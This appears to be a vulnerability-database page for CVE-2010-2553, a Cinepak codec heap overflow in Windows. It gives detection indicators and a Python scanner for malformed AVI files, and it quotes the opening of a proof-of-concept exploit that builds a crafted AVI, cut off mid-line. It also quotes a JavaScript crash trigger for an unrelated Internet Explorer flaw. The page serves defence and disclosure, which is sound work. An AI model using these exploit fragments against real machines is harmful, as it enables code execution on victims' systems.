CVE-2010-2553
Published: 2010-08-11
Priority: P266 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 30.89% (98.0th percentile)
The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability."
Detection & IOCs (extracted from sources)
- Crafted AVI file with malformed Cinepak codec data triggers a heap overflow in iccvid.dll; look for AVI files with an anomalous 'number_of_coded_strips' field (e.g. 0x0010 = 16 strips) combined with undersized strip data.
- Malicious AVI contains the 'cvid' FourCC in the stream format header, identifying Cinepak-encoded video; inspect the BITMAPINFOHEADER compression field for 0x64697663 ('cvid').
- Exploit generates a crafted AVI with RIFF/AVI headers, a 'movi' LIST chunk containing a '00dc' video chunk, and an 'idx1' index; detect AVI files where the Cinepak frame header declares dimensions inconsistent with the strip data size.
- The vulnerability is in the CVDecompress function of iccvid.dll; monitor for heap corruption exceptions originating from iccvid.dll during media file decompression.
- Proof-of-concept targets iccvid.dll on Windows XP SP3 specifically; exploit reliability and heap spray offsets may differ on Windows Vista SP1/SP2 and Windows 7.
- DOC 3 (exploit-db 15122) references a separate MSHTML findText vulnerability in Internet Explorer and is unrelated to CVE-2010-2553; no operational IOCs from that source apply to this CVE.
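A static check for the AVI indicators listed above, as an added example (not code from this page or from any cited source): it walks the RIFF chunks, confirms the 'cvid' compression FourCC in the stream format, and flags video chunks whose declared strip count does not fit the strip data present. The function names, the constructed sample file and the Cinepak layout used (10-byte frame header with the strip count at offset 8, 12-byte strip headers carrying a 3-byte big-endian size) are assumptions of this example.

```python
import struct

def iter_chunks(buf, start, end):
    """Yield (id, body) for leaf RIFF chunks, descending into RIFF/LIST containers."""
    pos = start
    while pos + 8 <= end:
        cid, size = buf[pos:pos + 4], struct.unpack_from("<I", buf, pos + 4)[0]
        body, body_end = pos + 8, min(pos + 8 + size, end)
        if cid in (b"RIFF", b"LIST"):
            yield from iter_chunks(buf, body + 4, body_end)  # skip 4-byte form/list type
        else:
            yield cid, buf[body:body_end]
        pos = body + size + (size & 1)  # chunks are padded to an even length

def cinepak_frame_findings(frame):
    """Compare the strip count in a Cinepak frame header with the data that follows."""
    if len(frame) < 10:
        return ["frame shorter than the 10-byte Cinepak frame header"]
    strips = struct.unpack_from(">H", frame, 8)[0]  # number of coded strips
    off = 10
    for i in range(strips):
        # strip size includes its own 12-byte header; 0 means the header is missing
        size = int.from_bytes(frame[off + 1:off + 4], "big") if off + 12 <= len(frame) else 0
        if size < 12 or off + size > len(frame):
            return [f"strip {i} of {strips} declared strips does not fit in the frame data"]
        off += size
    return []

def scan_avi(data):
    """Return findings for '##dc' video chunks of an AVI whose stream format is 'cvid'."""
    chunks = list(iter_chunks(data, 0, len(data)))
    # biCompression sits at offset 16 of the BITMAPINFOHEADER stored in 'strf'
    if not any(cid == b"strf" and body[16:20] == b"cvid" for cid, body in chunks):
        return []
    return [f for cid, body in chunks if cid[2:] == b"dc"
            for f in cinepak_frame_findings(body)]

def chunk(cid, body):
    return cid + struct.pack("<I", len(body)) + body + b"\x00" * (len(body) & 1)

def build_avi(declared_strips, real_strips):
    """Constructed sample: minimal AVI, one 'cvid' stream, one frame of empty strips."""
    strips = (b"\x10" + (12).to_bytes(3, "big") + bytes(8)) * real_strips
    frame = (b"\x00" + (10 + len(strips)).to_bytes(3, "big")
             + struct.pack(">HHH", 4, 4, declared_strips) + strips)
    strf = chunk(b"strf", struct.pack("<IiiHH4s", 40, 4, 4, 1, 24, b"cvid") + bytes(20))
    hdrl = chunk(b"LIST", b"hdrl" + chunk(b"LIST", b"strl" + strf))
    movi = chunk(b"LIST", b"movi" + chunk(b"00dc", frame))
    return chunk(b"RIFF", b"AVI " + hdrl + movi)
```

`scan_avi(build_avi(16, 1))` reports the mismatch for a frame that declares 0x0010 strips but carries one; `scan_avi(build_avi(1, 1))` returns an empty list.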
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - MSHTML Findtext Processing
exploitdb·2010-09-27
---
function Search(){
    var textinput = document.getElementById("Abysssec");
    var textRange = textinput.createTextRange();
    textRange.findText(unescape("%u4141"),-1);
    textRange.select(document.getElementById('d'));
    document.body.appendChild(textinput);
}
Abysssec
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
Exploit-DB
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)
exploitdb·2010-09-26·CVSS 9.3
---
'''
http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/
'''
'''
Title : Microsoft Cinepak Codec CVDecompress Heap Overflow
Version : iccvid.dll XP SP3
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-2553
MOAUB Number :
'''
import sys
def main():
aviHeaders = '\x52\x49\x46\x46\x58\x01\x00\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC8\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x
No writeups or analysis indexed.
- http://www.us-cert.gov/cas/techalerts/TA10-222A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-055
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11773
Published: 2010-08-11